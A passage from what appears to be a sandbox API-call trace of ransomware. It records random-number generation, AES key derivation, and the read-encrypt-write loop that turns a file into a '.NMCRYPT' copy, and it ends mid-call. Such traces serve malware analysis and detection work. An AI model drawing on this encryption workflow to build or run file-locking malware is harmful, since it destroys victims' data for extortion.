pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.791] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.791] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.792] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0147.792] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.792] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad4b8) returned 1 [0147.792] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.792] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.792] wcslen (_String="\\\\?\\") returned 0x4 [0147.792] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad238) returned 1 [0147.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.793] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2644) returned 1 [0147.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.794] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.794] GetLastError () returned 0x0 [0147.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.795] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.795] GetLastError () returned 0x0 [0147.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.795] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.795] GetLastError () returned 0x0 [0147.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.795] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.795] GetLastError () returned 0x0 [0147.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, 